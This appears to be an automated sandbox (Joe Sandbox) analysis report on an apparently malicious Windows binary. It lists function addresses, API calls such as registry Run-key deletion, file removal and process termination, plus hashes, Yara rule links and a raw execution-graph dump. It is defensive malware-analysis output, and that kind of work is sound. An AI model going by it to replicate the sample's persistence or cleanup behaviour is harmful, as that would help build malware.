                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Init_thread_footer__onexit
                                                                                                                                                                    • String ID: ,kG$0kG
                                                                                                                                                                    • API String ID: 1881088180-2015055088
                                                                                                                                                                    • Opcode ID: f9f143b1e95ac96eb86707cb7474d167dbc7ad60067a617d51a8135112e2f0db
                                                                                                                                                                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                                                                                                                                    • Opcode Fuzzy Hash: f9f143b1e95ac96eb86707cb7474d167dbc7ad60067a617d51a8135112e2f0db
                                                                                                                                                                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                                                                                                                                                    Strings
                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeleteOpenValue
                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                    • API String ID: 2654517830-1051519024
                                                                                                                                                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                    • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                                                                                                                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                    • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                    • String ID: pth_unenc
                                                                                                                                                                    • API String ID: 3325800564-4028850238
                                                                                                                                                                    • Opcode ID: cbeb5e690985b75f7686d3fc5d6754269001ae0680a5a222a39347c6f772a563
                                                                                                                                                                    • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                                                                                                                                    • Opcode Fuzzy Hash: cbeb5e690985b75f7686d3fc5d6754269001ae0680a5a222a39347c6f772a563
                                                                                                                                                                    • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                    • String ID: pth_unenc
                                                                                                                                                                    • API String ID: 1872346434-4028850238
                                                                                                                                                                    • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                                                                                                                    • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                                                                                                                                    • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                                                                                                                                    • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041BAE6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CountInfoInputLastTick
                                                                                                                                                                    • String ID: NG
                                                                                                                                                                    • API String ID: 3478931382-1651712548
                                                                                                                                                                    • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                                                                                                    • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                                                                                                                                    • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                                                                                                                    • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00440D35
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                    • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                                                                                                                    • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                                                                                                                                    • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                                                                                                                    • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                                                                                                                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                                                                                                                                    • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4100373531-0
                                                                                                                                                                    • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                                                                                                                    • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                                                                                                                                    • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                                                                                                                    • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:6.1%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                    Signature Coverage:1.3%
                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                    Total number of Limit Nodes:71
                                                                                                                                                                    execution_graph 37491 44dea5 37492 44deb5 FreeLibrary 37491->37492 37493 44dec3 37491->37493 37492->37493 37494 4287c1 37495 4287d2 37494->37495 37526 429ac1 37494->37526 37497 428818 37495->37497 37498 42881f 37495->37498 37509 425711 37495->37509 37531 42013a 37497->37531 37559 420244 97 API calls 37498->37559 37499 4260dd 37558 424251 120 API calls 37499->37558 37504 4259da 37557 416760 11 API calls 37504->37557 37506 425ad6 37509->37504 37510 429a4d 37509->37510 37514 422aeb memset memcpy memcpy 37509->37514 37517 4260a1 37509->37517 37509->37526 37527 4259c2 37509->37527 37530 425a38 37509->37530 37547 4227f0 memset memcpy 37509->37547 37548 422b84 15 API calls 37509->37548 37549 422b5d memset memcpy memcpy 37509->37549 37550 422640 13 API calls 37509->37550 37552 4241fc 11 API calls 37509->37552 37553 42413a 90 API calls 37509->37553 37512 429a66 37510->37512 37513 429a9b 37510->37513 37560 415c56 11 API calls 37512->37560 37525 429a96 37513->37525 37562 416760 11 API calls 37513->37562 37514->37509 37556 415c56 11 API calls 37517->37556 37519 429a7a 37561 416760 11 API calls 37519->37561 37563 424251 120 API calls 37525->37563 37526->37506 37564 415c56 11 API calls 37526->37564 37527->37506 37551 415c56 11 API calls 37527->37551 37530->37527 37554 422640 13 API calls 37530->37554 37555 4226e0 12 API calls 37530->37555 37532 42014c 37531->37532 37535 420151 37531->37535 37574 41e466 97 API calls 37532->37574 37534 420162 37534->37509 37535->37534 37536 4201b3 37535->37536 37537 420229 37535->37537 37538 4201b8 37536->37538 37539 4201dc 37536->37539 37537->37534 37540 41fd5e 86 API calls 37537->37540 37565 41fbdb 37538->37565 37539->37534 37544 4201ff 37539->37544 37571 41fc4c 37539->37571 37540->37534 37544->37534 37545 42013a 97 API calls 37544->37545 37545->37534 37547->37509 37548->37509 37549->37509 37550->37509 37551->37504 37552->37509 37553->37509 37554->37530 37555->37530 37556->37504 37557->37499 37558->37506 37559->37509 37560->37519 37561->37525 37562->37525 37563->37526 37564->37504 37566 41fbf8 37565->37566 37568 41fbf1 37565->37568 37579 41ee26 37566->37579 37570 41fc39 37568->37570 37589 4446ce 11 API calls 37568->37589 37570->37534 37575 41fd5e 37570->37575 37572 41ee6b 86 API calls 37571->37572 37573 41fc5d 37572->37573 37573->37539 37574->37535 37577 41fd65 37575->37577 37576 41fdab 37576->37534 37577->37576 37578 41fbdb 86 API calls 37577->37578 37578->37577 37580 41ee41 37579->37580 37581 41ee32 37579->37581 37590 41edad 37580->37590 37593 4446ce 11 API calls 37581->37593 37584 41ee3c 37584->37568 37587 41ee58 37587->37584 37595 41ee6b 37587->37595 37589->37570 37599 41be52 37590->37599 37593->37584 37594 41eb85 11 API calls 37594->37587 37596 41ee70 37595->37596 37597 41ee78 37595->37597 37652 41bf99 86 API calls 37596->37652 37597->37584 37600 41be6f 37599->37600 37601 41be5f 37599->37601 37607 41be8c 37600->37607 37631 418c63 memset memset 37600->37631 37630 4446ce 11 API calls 37601->37630 37604 41be69 37604->37584 37604->37594 37605 41bee7 37605->37604 37635 41a453 86 API calls 37605->37635 37607->37604 37607->37605 37608 41bf3a 37607->37608 37609 41bed1 37607->37609 37634 4446ce 11 API calls 37608->37634 37611 41bef0 37609->37611 37614 41bee2 37609->37614 37611->37605 37612 41bf01 37611->37612 37613 41bf24 memset 37612->37613 37615 41bf14 37612->37615 37632 418a6d memset memcpy memset 37612->37632 37613->37604 37620 41ac13 37614->37620 37633 41a223 memset memcpy memset 37615->37633 37619 41bf20 37619->37613 37621 41ac52 37620->37621 37622 41ac3f memset 37620->37622 37625 41ac6a 37621->37625 37636 41dc14 19 API calls 37621->37636 37623 41acd9 37622->37623 37623->37605 37627 41aca1 37625->37627 37637 41519d 37625->37637 37627->37623 37628 41acc0 memset 37627->37628 37629 41accd memcpy 37627->37629 37628->37623 37629->37623 37630->37604 37631->37607 37632->37615 37633->37619 37634->37605 37636->37625 37640 4175ed 37637->37640 37648 417570 SetFilePointer 37640->37648 37643 41760a ReadFile 37644 417637 37643->37644 37645 417627 GetLastError 37643->37645 37646 4151b3 37644->37646 37647 41763e memset 37644->37647 37645->37646 37646->37627 37647->37646 37649 4175b2 37648->37649 37650 41759c GetLastError 37648->37650 37649->37643 37649->37646 37650->37649 37651 4175a8 GetLastError 37650->37651 37651->37649 37652->37597 37653 417bc5 37655 417c61 37653->37655 37659 417bda 37653->37659 37654 417bf6 UnmapViewOfFile CloseHandle 37654->37654 37654->37659 37657 417c2c 37657->37659 37665 41851e 20 API calls 37657->37665 37659->37654 37659->37655 37659->37657 37660 4175b7 37659->37660 37661 4175d6 FindCloseChangeNotification 37660->37661 37662 4175c8 37661->37662 37663 4175df 37661->37663 37662->37663 37664 4175ce Sleep 37662->37664 37663->37659 37664->37661 37665->37657 37666 4152c7 malloc 37667 4152e2 37666->37667 37668 4152ef 37666->37668 37670 416760 11 API calls 37668->37670 37670->37667 37671 415308 ??3@YAXPAX 37672 41276d 37673 41277d 37672->37673 37715 4044a4 LoadLibraryW 37673->37715 37675 412785 37707 412789 37675->37707 37723 414b81 37675->37723 37678 4127c8 37729 412465 memset ??2@YAPAXI 37678->37729 37680 4127ea 37741 40ac21 37680->37741 37685 412813 37759 40dd07 memset 37685->37759 37686 412827 37764 40db69 memset 37686->37764 37689 412822 37785 4125b6 ??3@YAXPAX 37689->37785 37691 40ada2 _wcsicmp 37693 41283d 37691->37693 37693->37689 37696 412863 CoInitialize 37693->37696 37769 41268e 37693->37769 37789 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37696->37789 37697 41296f 37791 40b633 37697->37791 37700 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37706 412957 37700->37706 37712 4128ca 37700->37712 37706->37689 37708 4128d0 TranslateAcceleratorW 37709 412941 GetMessageW 37708->37709 37708->37712 37709->37706 37709->37708 37710 412909 IsDialogMessageW 37710->37709 37710->37712 37711 4128fd IsDialogMessageW 37711->37709 37711->37710 37712->37708 37712->37710 37712->37711 37713 41292b TranslateMessage DispatchMessageW 37712->37713 37714 41291f IsDialogMessageW 37712->37714 37713->37709 37714->37709 37714->37713 37716 4044f7 37715->37716 37717 4044cf GetProcAddress 37715->37717 37721 404507 MessageBoxW 37716->37721 37722 40451e 37716->37722 37718 4044e8 FreeLibrary 37717->37718 37719 4044df 37717->37719 37718->37716 37720 4044f3 37718->37720 37719->37718 37720->37716 37721->37675 37722->37675 37724 414b8a 37723->37724 37725 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37723->37725 37795 40a804 memset 37724->37795 37725->37678 37728 414b9e GetProcAddress 37728->37725 37730 4124e0 37729->37730 37731 412505 ??2@YAPAXI 37730->37731 37732 41251c 37731->37732 37734 412521 37731->37734 37817 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37732->37817 37806 444722 37734->37806 37740 41259b wcscpy 37740->37680 37822 40b1ab ??3@YAXPAX ??3@YAXPAX 37741->37822 37743 40ad76 37823 40aa04 37743->37823 37746 40ad4b 37746->37743 37835 40a9ce 37746->37835 37747 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37753 40ac5c 37747->37753 37749 40ace7 ??3@YAXPAX 37749->37753 37753->37743 37753->37746 37753->37747 37753->37749 37826 40a8d0 7 API calls 37753->37826 37827 4099f4 37753->37827 37755 40ada2 37756 40adc9 37755->37756 37758 40adaa 37755->37758 37756->37685 37756->37686 37757 40adb3 _wcsicmp 37757->37756 37757->37758 37758->37756 37758->37757 37841 40dce0 37759->37841 37761 40dd3a GetModuleHandleW 37846 40dba7 37761->37846 37765 40dce0 3 API calls 37764->37765 37766 40db99 37765->37766 37918 40dae1 37766->37918 37932 402f3a 37769->37932 37771 4126a8 37772 412766 37771->37772 37773 4126d3 _wcsicmp 37771->37773 37775 41270a 37771->37775 37966 4125f8 7 API calls 37771->37966 37772->37689 37772->37696 37773->37771 37775->37772 37935 411ac5 37775->37935 37786 4125da 37785->37786 37787 4125f0 37786->37787 37788 4125e6 DeleteObject 37786->37788 37790 40b1ab ??3@YAXPAX ??3@YAXPAX 37787->37790 37788->37787 37789->37700 37790->37697 37792 40b640 37791->37792 37793 40b639 ??3@YAXPAX 37791->37793 37794 40b1ab ??3@YAXPAX ??3@YAXPAX 37792->37794 37793->37792 37794->37707 37796 40a83b GetSystemDirectoryW 37795->37796 37797 40a84c wcscpy 37795->37797 37796->37797 37802 409719 wcslen 37797->37802 37800 40a881 LoadLibraryW 37801 40a886 37800->37801 37801->37725 37801->37728 37803 409724 37802->37803 37804 409739 wcscat LoadLibraryW 37802->37804 37803->37804 37805 40972c wcscat 37803->37805 37804->37800 37804->37801 37805->37804 37807 444732 37806->37807 37808 444728 DeleteObject 37806->37808 37818 409cc3 37807->37818 37808->37807 37810 412551 37811 4010f9 37810->37811 37812 401130 37811->37812 37813 401134 GetModuleHandleW LoadIconW 37812->37813 37814 401107 wcsncat 37812->37814 37815 40a7be 37813->37815 37814->37812 37816 40a7d2 37815->37816 37816->37740 37816->37816 37817->37734 37821 409bfd memset wcscpy 37818->37821 37820 409cdb CreateFontIndirectW 37820->37810 37821->37820 37822->37753 37824 40aa14 37823->37824 37825 40aa0a ??3@YAXPAX 37823->37825 37824->37755 37825->37824 37826->37753 37828 409a41 37827->37828 37829 4099fb malloc 37827->37829 37828->37753 37831 409a37 37829->37831 37832 409a1c 37829->37832 37831->37753 37833 409a30 ??3@YAXPAX 37832->37833 37834 409a20 memcpy 37832->37834 37833->37831 37834->37833 37836 40a9e7 37835->37836 37837 40a9dc ??3@YAXPAX 37835->37837 37839 4099f4 3 API calls 37836->37839 37838 40a9f2 37837->37838 37840 40a8d0 7 API calls 37838->37840 37839->37838 37840->37743 37865 409bca GetModuleFileNameW 37841->37865 37843 40dce6 wcsrchr 37844 40dcf5 37843->37844 37845 40dcf9 wcscat 37843->37845 37844->37845 37845->37761 37866 44db70 37846->37866 37850 40dbfd 37869 4447d9 37850->37869 37853 40dc34 wcscpy wcscpy 37895 40d6f5 37853->37895 37854 40dc1f wcscpy 37854->37853 37857 40d6f5 3 API calls 37858 40dc73 37857->37858 37859 40d6f5 3 API calls 37858->37859 37860 40dc89 37859->37860 37861 40d6f5 3 API calls 37860->37861 37862 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37861->37862 37901 40da80 37862->37901 37865->37843 37867 40dbb4 memset memset 37866->37867 37868 409bca GetModuleFileNameW 37867->37868 37868->37850 37871 4447f4 37869->37871 37870 40dc1b 37870->37853 37870->37854 37871->37870 37872 444807 ??2@YAPAXI 37871->37872 37873 44481f 37872->37873 37874 444873 _snwprintf 37873->37874 37875 4448ab wcscpy 37873->37875 37908 44474a 8 API calls 37874->37908 37876 4448bb 37875->37876 37909 44474a 8 API calls 37876->37909 37878 4448a7 37878->37875 37878->37876 37880 4448cd 37910 44474a 8 API calls 37880->37910 37882 4448e2 37911 44474a 8 API calls 37882->37911 37884 4448f7 37912 44474a 8 API calls 37884->37912 37886 44490c 37913 44474a 8 API calls 37886->37913 37888 444921 37914 44474a 8 API calls 37888->37914 37890 444936 37915 44474a 8 API calls 37890->37915 37892 44494b 37916 44474a 8 API calls 37892->37916 37894 444960 ??3@YAXPAX 37894->37870 37896 44db70 37895->37896 37897 40d702 memset GetPrivateProfileStringW 37896->37897 37898 40d752 37897->37898 37899 40d75c WritePrivateProfileStringW 37897->37899 37898->37899 37900 40d758 37898->37900 37899->37900 37900->37857 37902 44db70 37901->37902 37903 40da8d memset 37902->37903 37904 40daac LoadStringW 37903->37904 37905 40dac6 37904->37905 37905->37904 37907 40dade 37905->37907 37917 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37905->37917 37907->37689 37908->37878 37909->37880 37910->37882 37911->37884 37912->37886 37913->37888 37914->37890 37915->37892 37916->37894 37917->37905 37928 409b98 GetFileAttributesW 37918->37928 37920 40daea 37921 40daef wcscpy wcscpy GetPrivateProfileIntW 37920->37921 37927 40db63 37920->37927 37929 40d65d GetPrivateProfileStringW 37921->37929 37923 40db3e 37930 40d65d GetPrivateProfileStringW 37923->37930 37925 40db4f 37931 40d65d GetPrivateProfileStringW 37925->37931 37927->37691 37928->37920 37929->37923 37930->37925 37931->37927 37967 40eaff 37932->37967 37936 411ae2 memset 37935->37936 37937 411b8f 37935->37937 38007 409bca GetModuleFileNameW 37936->38007 37949 411a8b 37937->37949 37939 411b0a wcsrchr 37940 411b22 wcscat 37939->37940 37941 411b1f 37939->37941 38008 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 37940->38008 37941->37940 37943 411b67 38009 402afb 37943->38009 37947 411b7f 38065 40ea13 SendMessageW memset SendMessageW 37947->38065 37950 402afb 27 API calls 37949->37950 37951 411ac0 37950->37951 37952 4110dc 37951->37952 37953 41113e 37952->37953 37957 4110f0 37952->37957 38090 40969c LoadCursorW SetCursor 37953->38090 37955 4110f7 _wcsicmp 37955->37957 37956 411143 38091 4032b4 37956->38091 38109 444a54 37956->38109 37957->37953 37957->37955 38112 410c46 10 API calls 37957->38112 37958 411157 37959 40ada2 _wcsicmp 37958->37959 37962 411167 37959->37962 37960 4111af 37962->37960 37963 4111a6 qsort 37962->37963 37963->37960 37966->37771 37968 40eb10 37967->37968 37980 40e8e0 37968->37980 37971 40eb6c memcpy memcpy 37972 40ebb7 37971->37972 37972->37971 37973 40ebf2 ??2@YAPAXI ??2@YAPAXI 37972->37973 37974 40d134 16 API calls 37972->37974 37975 40ec65 37973->37975 37976 40ec2e ??2@YAPAXI 37973->37976 37974->37972 37990 40ea7f 37975->37990 37976->37975 37979 402f49 37979->37771 37981 40e8f2 37980->37981 37982 40e8eb ??3@YAXPAX 37980->37982 37983 40e900 37981->37983 37984 40e8f9 ??3@YAXPAX 37981->37984 37982->37981 37985 40e911 37983->37985 37986 40e90a ??3@YAXPAX 37983->37986 37984->37983 37987 40e931 ??2@YAPAXI ??2@YAPAXI 37985->37987 37988 40e921 ??3@YAXPAX 37985->37988 37989 40e92a ??3@YAXPAX 37985->37989 37986->37985 37987->37971 37988->37989 37989->37987 37991 40aa04 ??3@YAXPAX 37990->37991 37992 40ea88 37991->37992 37993 40aa04 ??3@YAXPAX 37992->37993 37994 40ea90 37993->37994 37995 40aa04 ??3@YAXPAX 37994->37995 37996 40ea98 37995->37996 37997 40aa04 ??3@YAXPAX 37996->37997 37998 40eaa0 37997->37998 37999 40a9ce 4 API calls 37998->37999 38000 40eab3 37999->38000 38001 40a9ce 4 API calls 38000->38001 38002 40eabd 38001->38002 38003 40a9ce 4 API calls 38002->38003 38004 40eac7 38003->38004 38005 40a9ce 4 API calls 38004->38005 38006 40ead1 38005->38006 38006->37979 38007->37939 38008->37943 38066 40b2cc 38009->38066 38011 402b0a 38012 40b2cc 27 API calls 38011->38012 38013 402b23 38012->38013 38014 40b2cc 27 API calls 38013->38014 38015 402b3a 38014->38015 38016 40b2cc 27 API calls 38015->38016 38017 402b54 38016->38017 38018 40b2cc 27 API calls 38017->38018 38019 402b6b 38018->38019 38020 40b2cc 27 API calls 38019->38020 38021 402b82 38020->38021 38022 40b2cc 27 API calls 38021->38022 38023 402b99 38022->38023 38024 40b2cc 27 API calls 38023->38024 38025 402bb0 38024->38025 38026 40b2cc 27 API calls 38025->38026 38027 402bc7 38026->38027 38028 40b2cc 27 API calls 38027->38028 38029 402bde 38028->38029 38030 40b2cc 27 API calls 38029->38030 38031 402bf5 38030->38031 38032 40b2cc 27 API calls 38031->38032 38033 402c0c 38032->38033 38034 40b2cc 27 API calls 38033->38034 38035 402c23 38034->38035 38036 40b2cc 27 API calls 38035->38036 38037 402c3a 38036->38037 38038 40b2cc 27 API calls 38037->38038 38039 402c51 38038->38039 38040 40b2cc 27 API calls 38039->38040 38041 402c68 38040->38041 38042 40b2cc 27 API calls 38041->38042 38043 402c7f 38042->38043 38044 40b2cc 27 API calls 38043->38044 38045 402c99 38044->38045 38046 40b2cc 27 API calls 38045->38046 38047 402cb3 38046->38047 38048 40b2cc 27 API calls 38047->38048 38049 402cd5 38048->38049 38050 40b2cc 27 API calls 38049->38050 38051 402cf0 38050->38051 38052 40b2cc 27 API calls 38051->38052 38053 402d0b 38052->38053 38054 40b2cc 27 API calls 38053->38054 38055 402d26 38054->38055 38056 40b2cc 27 API calls 38055->38056 38057 402d3e 38056->38057 38058 40b2cc 27 API calls 38057->38058 38059 402d59 38058->38059 38060 40b2cc 27 API calls 38059->38060 38061 402d78 38060->38061 38062 40b2cc 27 API calls 38061->38062 38063 402d93 38062->38063 38064 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38063->38064 38064->37947 38065->37937 38069 40b58d 38066->38069 38068 40b2d1 38068->38011 38070 40b5a4 GetModuleHandleW FindResourceW 38069->38070 38071 40b62e 38069->38071 38072 40b5c2 LoadResource 38070->38072 38074 40b5e7 38070->38074 38071->38068 38073 40b5d0 SizeofResource LockResource 38072->38073 38072->38074 38073->38074 38074->38071 38082 40afcf 38074->38082 38076 40b608 memcpy 38085 40b4d3 memcpy 38076->38085 38078 40b61e 38086 40b3c1 18 API calls 38078->38086 38080 40b626 38087 40b04b 38080->38087 38083 40b04b 